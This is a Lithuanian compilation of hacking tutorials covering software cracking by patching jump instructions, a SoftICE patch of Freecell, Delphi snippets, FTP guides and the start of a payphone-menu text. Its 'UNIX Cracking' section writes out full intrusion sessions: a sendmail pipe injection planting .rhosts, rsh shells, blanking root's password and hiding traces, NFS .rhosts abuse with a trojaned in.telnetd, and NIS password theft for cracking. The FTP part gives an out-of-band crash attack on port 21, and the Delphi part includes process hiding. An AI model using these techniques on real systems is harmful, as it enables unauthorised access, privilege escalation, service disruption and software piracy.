Na ka baigesi? NE, na gerai dar palaukim, na kaip dabar? na OK procesas baigtas. Dabar jusu ekrane turejo atsirasti keistas tekstas, kurio mes visiskai nesuprantam:). Nesijaudinkite, vienintelis dalykas kuri dabar jus turite padaryti, tai susirasti antra mygtuka esanti is desines (String Data Reference), kuris yra salia printerio mygtuko. Dabar jus matote langa kuriame surasytos ivairios zinutes ir panasiai. Taigi susiraskite ta zinute kuri prase CD ir paspauskite du kartus ant jos. Uzdarykite STRING DATA REFERENCE langa. Dabar jus esate nebe kodo pradzioje, o kazkur viduryje ar kazkas tokio, kiekvienu atveju vis kitaip. Taigi dabar jusu ekrane turi matytis ta zinute kuri praso kompakto. Dabar pati svarbiausia vieta. Kilkite i virsu, nuo tos zinutes, kol pamatysite kazka panasaus:

* Referenced by a (U)nconditional or (C)onditional Jump at Address:|:00410545 (c)|

Jusu atveju skaicius bus aisku kitoks, bet bendras vaizdas turi buti panasus. Susirade tai, paspauskite Goto(Win32Dasm virsuje), atsiradusiame meniu pasirinkite Goto Code Location ir parasykite si skaiciu, mano atveju tai 00410545 ir spauskite OK. Taigi jus vel kazkur nusokote, dabar nejudedami is vietos, nusirasykite skaiciu esanti Win32Dasm apacioje, kuri atrodo taip (isskyrus skaiciai):

Line:34040 Pg 401 of 409 Code Data @:0041052F @offset 0000F945h in File:

Vienintelis dalykas kurio mums reikia tai skaicius einantis po @offset, ne po @ bet po @offset na tik -h-nebereikia. Taigi mano atveju man bus reikalingas 0000F945 skaicius, jusu atveju, kitas(jau kartoti atsibodo) taigi dabar nusirase si skaiciu, paliekame Win32Dasm ir einame dabar prie HIEW. Hiew’e pasirenkame mus reikalinga EXE faila. Dabar spaudziame F4 ir pasirenkame Decode, paskui seka F5 paspaudimas. Taigi dabar parasome musu skaiciu, mano atveju, kaip zinome yra 0000F945 Dabar spaudziame enter, ir BOOM mes toje vietoje kur ir norime buti. Bet dabar as jums noriu pasakyti pagridndinius asemblerio kalbos JUMPUS:

ASM. —Ka reiskia —————————————————————- jne —Ivyksta suolis jei nelygu je —Ivyksta suolis jei lygu jmp —Bet kokiu atveju ivyksta suolis nop —Nieko neatlieka(no operation) ja —Ivyksta suolis jei virsuje jna —Ivyksta suolis jei nevirsuje jae —Ivyksta suolis jei virsuje arba lygu jnae —Ivyksta suolis jei nevirsuje arba lygu jb —Ivyksta suolis jei zemiau jnb —Ivyksta suolis jei nezemiau jbe —Ivyksta suolis jei zemiau arba lygu jnbe —Ivyksta suolis jei nezemiau arba lygu jg —Ivyksta suolis jei didesnis jng —Ivyksta suolis jei nedidesnis jge —Ivyksta suolis jei didesnis arba lygu jnge —Ivyksta suolis jei nedidesnis arba lygu jl —Ivyksta suolis jei mazesnis jnl —Ivyksta suolis jei nemazesnis jle —Ivyksta suolis jei mazesnis arba lygu jnle —Ivyksta suolis jei nemazesnis arba lygu —————————————————————-

Zinoma as suprantu, tai gali atrodyti is pradziu keblu, as pamenu, kai pats pirma karta tai pamaciau, O dieve galvojau, ir ka as cia bandau ismokti :)), bet kaip sakant kas bando tam ir pavyksta. Bet dabar jums tereikia pakeisti: Jei dydesnis, tai keiciate i Jei nedidesnis, tai yra jei yra JNE keiciate i JE ir atvirksciai, o linksmiausia dalis tame, kad netgi daugelis programu yra apsaugotos tokiu budu:). Taigi as dabar stoviu:

0000F945: 751D jne 0000F964

Taigi kaip jau supratote man reikia pakeisti, JNE i JE . Dabar jus pasakysite:”Na tai kas, kad as zinau ka i ka reikia keisti, bet KAIP man tai padaryti???” Taigi sakau reikia paprasciausiai pakeisti viena skaiciu, vienu daugiau arba vienu maziau. Taigi pas manes yra skaicius 751D ir JNE. Norint is JNE padaryti JE as turiu pakeisti 751D i 741D. O jei butu pas manes JE tai tureciau atvirksciai ne atimti, bet prideti prie 5 . Kartais buna, kad reikia isviso panaikinti operacija taigi, parasydami NOP vietoj JNE ar kas bebutu, tai darome parasydami 90 beje, jei jau mes turime atjungti operacija(NOP), tai isidemekite, kiek skaiciu turi ta eilute, Win32Dasme ant kurios mes stovejome, kai atlikome funkcija Go to code location isidemekite antra skaiciu is kaires, toje eiluteje kur stovite. Jei skaicius pavyzdziui yra 751D tai ji keiciame 9090, jei 751D000000 tai ji turime pakeisti i 9090909090 vienu zodziu turime pakeisti skaiciu i skaiciu. Beje kai Hiew’e jus rasysite 90 nekreipkite demesio, kad eilute nusoka, paprasciausiai surasykite tiek 90 kiek reikia ir viskas.Norint kad mums leistu keisti kanors, paspauskime F3 ir galime irasineti, o kai baigsite rasyti , tai paspauskite F9 – uzfiksavimui ir F10 – isejimui, ir viskas. Kartais buna, kad neiseina ne vienas auksciau isvardytas variantas. Tada paprasciausiai susirasykite visu JUMP’u @offset numerius einancius nuo zinutes i virsu ir juos keitaliokite, juk niekada negali buti uztikrintas kuris JUMP’as reikalingas.

PS: shis tutorialas yra sudetas ish keliu ir viskas surishta mano pachio mintimis;)

10. UNIX Cracking

Pvz No1.

crack% telnet target.remote.com 25Connecting to 123.456.654.321.! prisijungiam prie 25 porto – tai SMTP220 sendmail SMI/4.3.5.2 ready! versija kaip zhinome turi buga.helo xxx220 Helo xxx, ( crack.edu )mail from: |echo crack.edu/.rhosts@target.remote.com! statome komanda vietoj atgalinio adreso.200 Sender ok.rcpt to: nosuchuser! ivedam ishanxto neteisinga adresata500 nosuchuser: user unknown! nekreipdami demesio i praneshima tesiame dialoga .dataŽ230 Enter mail, end with .200 Mail accepted! viskas mashina nulauzhta….quitŽcrack% su! dabar ilendam taip kad musu nebutu matyti per who# rsh target.remote.com /bin/csh -iWelcome to remote.com!Warning! No access to terminal, job control disabled!target#

Pvz No2.

crack# su – bin$ rsh target.remote.com /bin/csh -i! Faile /etc/hosts.equiv yra uzhrashas + ir klaida…Welcome to remote.com!! Katalogas /etc su savininku bin…Warning! No access to terminal, job control disabled!% ls -ldg /etcdrwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/% cd /etc! Darom kad mums galima butu editinfi passwd …% mv passwd passwd.was% cp passwd.was passwd! redaguojam% ed passwd2341Ž1proot:Nkkh5gkljGyj:0:0:Root:/:/bin/cshs/Nkkh5gkljGyj//proot::0:0:Root:/:/bin/cshw2341q! Ir super useryje.%echo /bin/csh -i | su rootWarning! No access to terminal, job control disabled!target# mv /etc/passwd.was /etc/passwd! Kad niekas nepastebetu ka mes dareme.

Pvz No3.

crack% showmount -e target.remote.comExport list for target.remote.com/home Everyone/disk3 neptun pluton alpha! Domeininej katalogaj prieinami per NFScrack% su# mount -t nfs target.remote.com:/home /mnt# cd /mnt! Mountinam kataloga sau# ls -ldg *drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/# echo crack.eduŽ user/.rhosts! Idiegiam .rhosts pas pas userius# catŽ /etc/passwdŽuser::257:20::/:^DŽ! sukuriam toki pati pas mumi# su – userŽ! Tampam juo$ rsh target.remote.com /bin/csh -iWarning! No access to terminal, job control disabled!!Ir einam i svechius -)% iduid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)% ls -ldg /usr/etc! Katalogas prieinamas writinimujdrwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc% grep telnet /etc/inetd.conftelnet stream nowait root /usr/etc/in.telnetd in.telnetd!Radom programike kuri pasileis!per roota ish musu katalogo% cd /usr/etc% mv in.telnetd in.telnetd1! sukuriam trojana% catŽ in.telnetd#!/bin/shexec /bin/csh -i^D% chmod 755 in.telnetd! ir paleidzhiam ji% telnet 127.1Connecting 127.1.Warning! No access to terminal, job control disabled!# chown user /etc;! Darom /etc savu^M: command not found# exit;^M: command not foundConnection closed by foreign host.% cd /etc! o toliau kaip in Pvz No1.……..

Pvz No4.

! chekinam ar yra NIS Žcrack% rpcinfo -p target.remote.com | grep bind120000 2 udp 2493 ypbind! yra toxaj ….crack% ypx -o target.passwd -g target.remote.com! pasimam paswordu failacrack% crack target.passwd! leidzhiam passwd ieshkokli[ a lot of time ]OK, user user has password iamuser! radom, uzheinamcrack% telnet target.remote.com! toliau viska kaip kad prieshtai buvusiam pvz .……

– Hex –

(imti pvz, versta, kurta , bla bla bla rezultatas priesh akis)Shitie budai yra pakankamai seni ir vieni ish primytiviausiu bet … hehsusipazhinkit su principu nes yra tokiu kurie net neisivaizduoja kaip yradaromi tokie darbai ir uzhduoda tokius klausimus … mazhdaug su kokiaprogramele tu crackini ? ;

Informacion rulez and if u rule information …..

11. Delphi

Sios komandos skirtos programavimo kalbai – Delphi. Jos isbandytos su 5.0 versija.

……by ZErOnE zerone@xxx.lt______________________________________________________________________

1. Shut Down, Reboot, Standby funkcijos: ExitWindowsEx(EWX_SHUTDOWN,0); { ShutDown } ExitWindowsEx(EWX_REBOOT,0); { Reboot } ExitWindowsEx(EWX_POWEROFF,0); { Standby }______________________________________________________________________

2. Gauti pc IP adresa: uses winsock; …

function GetIPAddress: string; var phoste:PHostEnt; Buffer:array[0..100] of char; WSAData:TWSADATA; begin result:=”; if WSASTartup($0101, WSAData) <> 0 then exit; GetHostName(Buffer,Sizeof(Buffer)); phoste:=GetHostByName(buffer); if phoste = nil then begin result:=’127.0.0.1′; end else result:=StrPas(inet_ntoa(PInAddr(phoste^.h_addr_list^)^)); WSACleanup; end;

procedure TForm1.Button1Click(Sender: TObject); begin Label1.Caption:=GETIPAddress; end; ______________________________________________________________________

3. Gauti win’u ir system foldery: function GetWinDir: String; var dir: array [0..max_path] of char; begin GetWindowsDirectory(dir, max_path); result:=StrPas(dir); end;

function GetSysDir: String; var dir: array [0..max_path] of char; begin GetSystemDirectory(dir, max_path); result:=StrPas(dir); end;

procedure TForm1.Button1Click(Sender: TObject); begin label1.caption:=GetWinDir; label2.caption:=GetSysDir; end; ______________________________________________________________________

4. Sisteminiu klavisu isjungimas/yhungimas (Alt+Tab, Alt+Ctrl+Del) : var OldVal: LongInt; begin SystemParametersInfo (97, Word (True), @OldVal, 0); //disable SystemParametersInfo (97, Word (False), @OldVal, 0); //enable end;______________________________________________________________________

5. Pakeisti background’a : SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PChar(‘C:pvz.BMP’), SPIF_SendWININICHANGE); ______________________________________________________________________

6. Pakeisti peles pozicija : SetCursorPos(600,600);______________________________________________________________________

7. Gauti ScreenShot’a : function GetScreenShot:TBitmap; var Desktop:HDC; begin Result:= TBitmap.Create; Desktop:= GetDC(0); try try Result.PixelFormat:=pf32bit; Result.Width:=Screen.Width; Result.Height:=Screen.Height; BitBlt(Result.Canvas.Handle,0,0,Result.Width,Result.Height,Desktop,0,0,SRCCOPY); Result.Modified:=True; finally ReleaseDC(0,Desktop); end; except Result.Free; Result:=nil; end; end;

procedure TForm1.Button1Click(Sender: TObject); begin Image1.Picture.Bitmap:=GetScreenShot; end; ______________________________________________________________________

8. Darbas su .ini failais :

uses inifiles; …

var ini: TIniFile; …

var reiksme1:string; {nuskaitymas} begin reiksme1:=ini.ReadString(‘Section’,’Edit1′,”); label1.caption:=reiksme1; end;

ini.WriteString(‘Section’,’Edit1′,edit1.text); {yrasimas}

procedure TForm1.FormCreate(Sender: TObject); begin ini:= TIniFile.Create(‘c:test.ini’); {.ini failo sukurimas} end;______________________________________________________________________

9. Enable/Disable Start mygtuko : EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), TRUE); {enable}

EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), FALSE); {disable}______________________________________________________________________

10. paslepti/grazinti desktop’a : ShowWindow(FindWindow(nil,’Program Manager’),SW_HIDE); {paslepti}

ShowWindow(FindWindow(nil,’Program Manager’),SW_SHOW); {grazinti}______________________________________________________________________

11. Programos paslepimas :

const RSP_SIMPLE_SERVICE = 1; RSP_UNREGISTER_SERVICE = 0;

var function RegisterServiceProcess(dwProcessID, dwType: DWord): DWord;stdcall;external ‘Kernel32.dll’ name ‘RegisterServiceProcess’;

{Ushsidek taimeri su intervalu 1} procedure TForm1.Timer1Timer(Sender: TObject); begin Timer1.Enabled := False; Form1.Visible := False; RegisterServiceProcess(GetCurrentProcessID,RSP_SIMPLE_SERVICE); Brush.Style := bsClear; end;

{o kai uzdarysi forma daryk taip:} procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction); begin RegisterServiceProcess(GetCurrentProcessID,RSP_UNREGISTER_SERVICE); end;_______________________________________________________________________

12. Kopijuoti/Perkelti/Trinti folderius :

uses shellapi … function copydir(von,zieldir: String): boolean; var fos: TSHFileOpStruct; begin ZeroMemory(@fos, SizeOf(fos)); with fos do begin wFunc := FO_COPY; fFlags := FOF_FILESONLY; pFrom := PChar(von+#0); pTo := PChar(zieldir) end; Result:=(0=ShFileOperation(fos)); end;

function movedir(von,zieldir: String): boolean; var fos: TSHFileOpStruct; begin ZeroMemory(@fos, SizeOf(fos)); with fos do begin wFunc := FO_MOVE; fFlags := FOF_FILESONLY; pFrom := PChar(von+#0); pTo := PChar(zieldir) end; Result:=(0=ShFileOperation(fos)); end;

function deldir(dir: String): boolean; var fos: TSHFileOpStruct; begin ZeroMemory(@fos, SizeOf(fos)); with fos do begin wFunc := FO_DELETE; fFlags := FOF_SILENT or FOF_NOCONFIRMATION; pFrom := PChar(dir+#0); end; Result:=(0=ShFileOperation(fos)); end;

procedure TForm1.Button1Click(Sender: TObject); begin if copydir(‘c:mp3′,’c:xxx’)=true then begin ShowMessage(‘Dir copied.’); end; end; ______________________________________________________________________

12. Freecell for Windows 98 SE krekinimas

Info:Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)Irankiai: SoftICE, Betkoks šešioliktainis redaktorius (http://ucol.home.lt/cgi-bin/ucol.pl?l_tools)Taikinys: Žaidimas „Freecell“

Intro:Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti :]Kam gi reikia krekinti „Freecell“? Jeigu žaidžiame šį žaidimą ir mums niekaip nesiseka jį sužaisti, taigi mes norime iš jo išeiti ir vėl pradėti iš naujo, bet išeinant pamatome dialogą: „Are you sure you want to quit this game?“. Jeigu spaudžiame „Yes“, tai mums užskaitomas pralaimėjimas, o mes to visai nenorime :] Todėl reikia padaryti, kad tas dialogas visai neiššoktų ir nebūtų užskaitytas pralaimėjimas.

Pora sakinių:Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, šešioliktainius redaktorius ir assembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):…INIT=”CODE ON; X;”… EXP=c:windowssystemkernel32.dllEXP=c:windowssystemuser32.dllEXP=c:windowssystemgdi32.dll…Kombinacijos:Ctrl+D – įeiti į SoftICE;F5 – įšeiti iš SoftICE;F10 – vykdyti programą po vieną eilutę;F8 – jeigu esame ant procedūros, įeiti į ją.

Krekinimas:Jūs laisvai galite nukrekinti ir „Freecell“ iš windows 95, ten viskas labai panašu, nes kiek žiūrėjau failų dydžiai skiriasi tik keliais baitais. Įeiname į žaidimą (StartProgramsAccessoriesGamesFreecell). Paleidžiame jį (GameNew Game). Bandome išeiti iš jo. Pamatome dialogą: „Are you sure you want to quit this game?“. Spaudžiame „No“ (juk nenorime pralaimėti :)). Einame į SoftICE (Ctrl+D). Rašome: bpx messagebox. Išeiname iš SoftICE (F5). Vėl bandome išeiti. Aktyvuojasi SoftICE. Spaudžiame F11 (išėjimas iš proceduros). Pasirodo dialogas. Spaudžiame „No“. Vėl aktyvuojasi SoftICE. Štai ką matome:

…:03D8 68D604 push ds ;dialogo parametras:03DB 1E push 56c ;dialogo parametras :03DC 686C05 push ds ;dialogo parametras :03DF 6A24 push 24 ;dialogo parametras :03E1 9A00009717 call user!messagebox ;iškviečiame dialogą:03E6 3D0700 cmp ax,0007 ;ar buvo paspausta „No“:03E9 0F846E04 jz 085b ;jeigu paspaudėme „No“ nedarom nieko:03ED E8FE1A call 1eee ;užskaitome pralaimėjimą :03F0 E80734 call 38ca ;užskaitome pralaimėjimą :03F3 E9BFFE jmp 02b5 ;nošokame į išėjimą…

Užsirašome pilkai pažymėtys baitus (68D6041E686C056A24). Jų mums prireiks vėliau. Taigi mums reikia praleisti dialogą ir pralaimėjimo užrašymą ir iš karto nušokti į išėjimą. Tuo mums puikiai pasitarnauja pirmasis dialogo parametras, kuris užima tiek baitų kiek ir išėjimo komanda (jmp 02b5). Todėl tą dialogo parametrą (push ds) reikia pakeisti komada jmp 02b5. Rašome: bpx 3d8. Tai reiškia, kad SoftICE sustos toje vietoje, kai bus bandoma užkrauti pirmą dialogo parametrą. Išeiname iš SoftICE (F5). Bandome išeiti iš žaidimo. Aktyvuojasi SoftICE ties pirmu dialogo parametru. Rašome: a (tai reiškia, kad mes pakeisime komandą push ds kita). Dabar rašome jmp 02 b5 (keičiame komandą). Spaudžiame Enter, paskui Escape. Štai ką matome:

…:03D8 E9DAFE jmp 02b5 ;nošokame į išėjimą:03DB 1E push 56c :03DC 686C05 push ds:03DF 6A24 push 24 :03E1 9A00009717 call user!messagebox:03E6 3D0700 cmp ax,0007:03E9 0F846E04 jz 085b:03ED E8FE1A call 1eee:03F0 E80734 call 38ca :03F3 E9BFFE jmp 02b5…

Pasikeitė trys baitai, užsirašome raudonai pažymėtus (pasikeitusius) baitus (E9DAFE). Išeiname iš SoftICE (F5). Kartu su SoftICE užsidarė žaidimas ir nebuvo jokio dialogo. Einame į šešioliktainį redaktorių, atidarome faila freecell.exe, vykdome paiešką pagal pilkai pažymėtus užsirašytus baitus. Suradę juos, tris pirmus pakeičiame į raudonai pažymėtus užsirašytus baitus (E9DAFE), išsaugome failą. Išeiname iš šešioliktainio redaktoriaus.

Pabaiga:Viskas žaidimas „nukenksmintas“. Pabandykite paleisti jį, šiek tiek jame pažaisti ir išeiti. Ką matote? Jokio dialogo išeinant! Vėl įeiname į žaidima, pažiūrime į rezultatus. Rezultatai tokie patys, pralaimėjimas neužskaitytas! Bet žaidimas iki galo dar nenukrekintas, nes dialogas atsiranda vykdant žaidimo meniu komandą „GameNew Game“ antrą kartą. Šitą dialogą pabandykite nukrekinti patys.

13. Domenas dykai

Nemokamos domainu dalintojos namezero hakasTurbus daugelis zinot kompanija namezerohttp://www.namezero.comkuri nemokamai jums duoda domaina (com, net, org). Bet yra trukumas- ji jusu puslapio apacioje padaro frame`a, kuris gadina visa vaizda.Pabandykime pagalvoti kaip jis padaro sita visa mesla. As manau jis daro taip: sukuria html dokumenta, kuris suskirstytas i du frame`us, kuriu vienas ira jusu svetaines tikrasis adresas, kitas namezero reklama.Pasirodo to galima isvengti. Kaip taipadaryti?I pagalba ateina JavaScript: jus savo puslapio titulineme dokumente iterpete JavaScript`uka, kuris jusu frame`a sulauzo, t.y. padaro per visa page`a. stai kaip atrodo sitas scriptas:<script language=”JavaScript”><!– Slepeme nuo narsykliu, kurios nesupranta JavaScript// Copyright © 2000 uid=o// Created by SaTaN//www.zemrsn.lt/uid0if (self.parent.frames.length != 0)self.parent.location=”index.html”;//vietoj index.html galite/privalote rasyti jusu norima dokumenta, kuri suaktyvinus dingsta visi frame`ai// –></script>Kuo sitas budas yra blogas?Nevisos narsykles supranta Javasript ir nevisi narsykleje JavaScript yra ijunge.Beto jei jus norite issivaduoti tik is to namezero frame`o, o kitus, savo puslapio frame`us paliktitai jums neisdeks.Iseitis: nenaudokite savo puslapyje frame`u arba padarykite izangini puslapi i jusu frame`ini puslapi, kureme ir bus visas frame`u zydymas.Demonstracija viso sito galite pamatyti cia:http://www.userid0.orgTai yra uid=0 domainas, su nukilintu frame`u.-=Visa sitai nera versta, kopijuota ar kitai pasisavinta is kitu dokumentu, saitu. Visa tai tik uid=0 sugalvota=-

14. FTP totorial`as

FTP (file transfer protocol)- failu perdavimo protokolas. Naudojantis siuo protokolu galima ivairia informacija failu pavidalu perduoti is vieno kompiuterio i kita, nepriklausomai nuo atstumo tarp kompiuteriu ar ju operaciniu sitemu. Tai vienas is budu perkelti jums reikalinga informacija is kito kompiuterio i savaji ir atvirksciai.

-= FTP reikalingas: =-

Padeti sureguliuoti failu (programu arba/ir duomenu) paskirstymaSuteikti galimybe tiesiogiai ar netiesiogiai naudotis sistemos resursais Apriboti vartotojo is kitos sistemos navigacija nutolusioje sistemooje Efektyviai ir patikimai perduoti duomenis isvienos sistemos i kita

Failu perdavima is vienos sistemos i kita relizuoja dvi programos, naudojancios FTP protokola: programa-serveris, kuri veikia tolimoje sistemoje, ir programa-klientas, kuri aptarnauja norincius pasiimti/duoti failus tolimai sistemai.

Programa-serveris laukia uzklausos ir po to specialiu protokolu realizuoja failu siuntima is/i tolimos sistemos i/is prisijungusiji kompiteri ir taip pat aptarnuoja programa-klienta, t.y. priima ir siuncia specialias ftp komandas.

Programa-klientas prisijungia prie tolimos sistemos, siuncia failus is/i tolima sistema, kuria patogia (arba ne) vartotojo aplinka ir dialogus su vartotoju, transformuoja vartotojo komandas i standartinu ftp komandu seka ir perduoda ja kaip uzklausa ar atsakyma i uzskausa programai-serveriui.

Prisijunge prie tolimos sistemos, jus igaunate dauguma teisiu, kurias turetumete, jei naudotumetes TELNET (aisku prgramu vykdyti ar tikrinti pasto etc neiseis). Bet jus galesite trinti, perkelti, kopijuti etc failus (aisku jei jus turesite tam tikrus leidimus). Jusu teises priklauso nuo sistemos konfiguracijos ir aisku jusu vartotojo vardo (USERNAME).

Prisijungus prie kokio tai FTP serverio jus turite prisistatyti, t.y. nurodyti savo vartotojo varda (username) ir slaptazodi (password). Dauguma serveriu leidzia prisijungti su Anonymouse ar ftp vartotojo vardu (kur password buna jusu email). Tada jusu teises priklauso nuo serverio admino, bet dazniausiai jus tegalite failus tik parsiusti (kartais leidziama ideti failus i incoming kataloga).

Jei naudojates ne visualiu ftp klientu, tai jums reikes zinoti keleta komandu:

pwd – Parodo kokiame kataloge yra siuo metu vartotojas (t.y. jus) cd – Keicia kataloga, kuriame jus esate mkdir – Sukuria kataloga rmdir – Istrina kataloga. rename – Pervardina faila. delete – Be komentaru get – Parsiunce faila is tolimos sistemos i jusiske put – Siunce faila is jusu sistemos i tolima FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.

FTP exploitus gali rasti siuose saituose:

http://cert.org

http://www.iss.net/cgi-bin/xforce/xforce_index.pl

http://packetstorm.genocide2600.com

http://www.rootshell.com

http://www.slashdot.org

15. FTP Tutorial 2

DIDELIS FTP TUTORIALAS NAUJOKAMS IR NE TIK=====================================================================Sveiki, shiame tekste aprasysiu, kas yra FTP, kam jis naudojamas, keleta terminu ir siaip idomiu dalyku. Pirmiausia, tai jei tau yra labai nepatogu skaityt si teksta (ar kitus) kur reikia vazinet tai i kaire, tai i desine, tai tai yra todel, kad pas tave nepadarytas word wrap. Ji gali padaryt edit/word wrap.

DISKLEIMERIS:=====================================================================Man yra visiskai nesvarbu, ka tu darysi paskaites si teksta, bet jei padarysi ka nors negero kaltink tik pats save, nes as ji rasiau tik tam, kad galetum apsisviest. >)=====================================================================TURINYS:=====================================================================1.0–Kas yra FTP ir kuo jis yra geras2.0–FTP komandos3.0–FTP hacking’as4.0–Keletas FTP bugu5.0–Keletas terminu naujokams=====================================================================1.0 :FTP (file transfer protokal) lietuviskai butu failu siuntimo protokolas. FTP serveriai leis tau ieiti su User Anonymous, o vietoj passwordo reikes irasyt savo e-maila. Aisku, jei tu turi useri ir zinai user passworda, tai geriau jungtis taip. Jei pasijungsi su Anonymous, tai tu turesi tik read-access. Taip pat galesi matyt tik labai ribota kieki failu. Jei turi ten useri, tai turetum turet tada ir write-access. Tuomet galetum matyt visus isskyrus root-accsess fileus. FTP yra labai geras dalykas, nes kai prisijungi prie FTP serverio, po ji gali vaiksciot kaip po savo kompa. Windowsams labai gera programa yra WS_FTP, nes ji labai patogi valdyti, ir langas, kuriame matai FTP serverio kompa bus panasus i Norton Commander langa. WS_FTP gali atsisiut is www.tucows.com arba kiek zinau ji yra ir mail.tiltas.lt FTP serveryje. FTP naudoja 21 porta.=====================================================================2.0 :Jei prie FTP servo jungies per DOS ar UNIX komanda FTP, tai tada turesi rinkt keleta tokiu komandu, jei noresi paziuret, nusiust ar atsisiut failus:

cd kaip ir UNIXe ar DOSe ji keicia direktorijas (folderius) kompe, kuriame esilcd ji keicia tavo kompe direktorijasdir/ls parodo direktorijas ir failus, kurie yra direktorijoj kurioj esiget atsisiuti failamget atsisiusti daug failuput nusiusti failamput nusiusti daug failupwd paraso, kurioje direktorijoj tu esi=====================================================================3.0 :FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.FTP exploitus gali rasti siuose saituose:cert.orgwww.iss.net/cgi-bin/xforce/xforce_index.plpacketstorm.genocide2600.comwww.rootshell.comwww.slashdot.org

Sie saitai nera illegalus. Jie yra legalus ir jie paprasciau paaskina, kokios skyles gali buti jusu kompe ir panasiai.Taip pat gali subscribeintis bugtraqe. Cia yra labai gera konferencija, tiems, kas domisi OS, ir programu exploitais, bugais. www.securityfocus.comSiuose saituose tau reiktu ieskoti zodziu, tai yra OSu, programu. Pvz.: pasijungiu prie servo, ir matau, kad jis naudoja Mandrake Linux. Tada eini i kuri nors is isvardintu saitu, ir i searcha (ar kur kitur) Mandrake Linux 2.2.13. Tada ten gaunat keleta exploitu ir galbut iseis jums gauti root access!!! Bet aisku turbut apie tai tik svajot… Nu nesvarbu. Jei nori suzinot FTP servo naudojama OS, bandyk jungtis su telnet’u per porta 21, 22, 23, 25. Ir panasiai. Taip pat per 25 porta jei iseis pasijungt, tai suzinosi ir naudojama Send-mail programa. O kaip zinoma, send-mail programos turi ivairiu exploitu…=====================================================================4.0 :Keletas siu bugu yra paprastos padarytos klaidos, ir jie nera kokie nors fantastiski. Jie cia yra surasyti tik tam, kad tu jei esi naujokas, galetum susipazinti su keletu exploitu.Sie bugai yra paimti ne is kokiu nors dideliu hacking saitu, o is paprastu homepageu, kurie pamoko, kaip savoj sistemoj istaisyt klaidas.

1-bugas. FTP Bounce Attack (jis yra per ilgas, nueik i http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425)2-bugas. Bet kas is isores galetu isjunkt FTP serveri. Ir jei dar FTP servas naudoja win 3.1 systema tikrai nusicrash’ins.Programa: WinQVT/NET (tinka visos versios)Exploitint: paprasciausiai issiusk OOB (Out of Band) i porta 21.Kaip ji exploitint naujokams, ar tiems kurie tingi kaip nors vienaip ar kitaip terliotis: Su bet kokiu winnuke reikia issiust ta packeta (ar ka ten siuncia nukeas) ne i 139 porta, bet i 21 porta. Sis budas turetu tikrai suveikt ant win 3.1 ir kazka girdejau, kad WIN NT 4.0 turi ta pati bug’a…Taip pat, kai pasijungi prie FTP servo su telnet, DOS, ar UNIX, pabandyk surinkt SYST komanda. Tau tada turetu ismest idomios informacijos apie ta kompa, tai yra: OS, bei info apie FTP serva.=====================================================================5.0 :1. Daemon – programa, kuri klauso, ar niekas nesijungia per koki nors porta, ir jei jungiasi, bendrauja su tuo, kas jungiasi.2. Root – Useris, kuris UNIXe gali daryti VISISKAI KA NORI. Tai yra, jis gali keist kitu user’iu passwordus, kreatint naujus userius, trint ka tik nori, ir pan. pan…3. Flames – kai ant kieno nors varai, tai yra vadini ji visokiu daunu, lochu, debilu, gejum ir pan. Flameinama paprastai per e-maila.4. ISP – Internet service provider. Jei nesupranti angliskai, tai Interneto rysio tiekejas.5. Read-access, write-access ir pan. – tai tam tikri tavo veiksmu apribojimai. Jei turi read-access, tai gali tik skaityti ir atsisiusti, ir tai ne visus failus. Jei turi write-access, tai gali irasyti i sistema ka nori, bet negali daryti ka nori. Root-access gali daryti KA TIK NORI.=====================================================================Laukite sio texto papildymo…

Si texta rase spadofora. AteIki pasimatymo NETE!2000.05.21 17:05

16. Taksofonai zhaliems

Visishko idioto ivadas i praktine telefonija“TAKSOFONAI ZHALIEMS”

Parenge: ww0lf1999, Kaunas

Ishpostinus cyberia/MG failiuka apie taksofonu “Pulsar-50” meniu, susilaukemedidelio demesio ir labai daug klausimu, kas ten yra kaip :)Pavarges atsakineti i klausimus, nutariau parashyti kiek ishsamesni tekstashia tema. Taigis…

Shiuo metu Lietuvoje labiausiai paplite yra “Pulsar-50” taksofonai, liaudyjevadinami “czipiniais”. Daugelis vartotoju linke naudotis jais kaip nurodo “Lietuvos telekomo” instrukcija. Ir mazhai kas zhino, kad shis taksofonas –tai mazhytis kompiuteris, kuri galima konfiguruoti, aktyvuoti vienas ar kitas funkcijas ir gauti ish jo aibe naudingos informacijos. Taksofonasvaldomas per meniu, labai panashu i mobiliuju telefonu meniu, ir jeigujums kada teko naudotis mobiliaku, jus visai nesunkiai susigaudysite.

Visa informacija taksofone pateikiama dvieju eilucziu skystuju kristalu (LCD)ekrane (tame pacziame, kuriame jus matote jusu renkama numeri ir kiek jums liko kreditu). Musu tekste mes vaizduosime tai, ka jus matote ekranekvadratiniuose skliaustuose, pvz:

[IDEKITE KORTELE ARBA][NEMOKAMAS NUMERIS ]

Tai, ka jus renkate taksofono klaviaturoje, vaizduosime figurinese skliaustuose, pvz:

{8191} – reishkia suspaudzhiame mygtukus 8 1 9 1

Paaishkinimas visishkam idiotui: klaviatura – tai taksofono mygtukai. 🙂

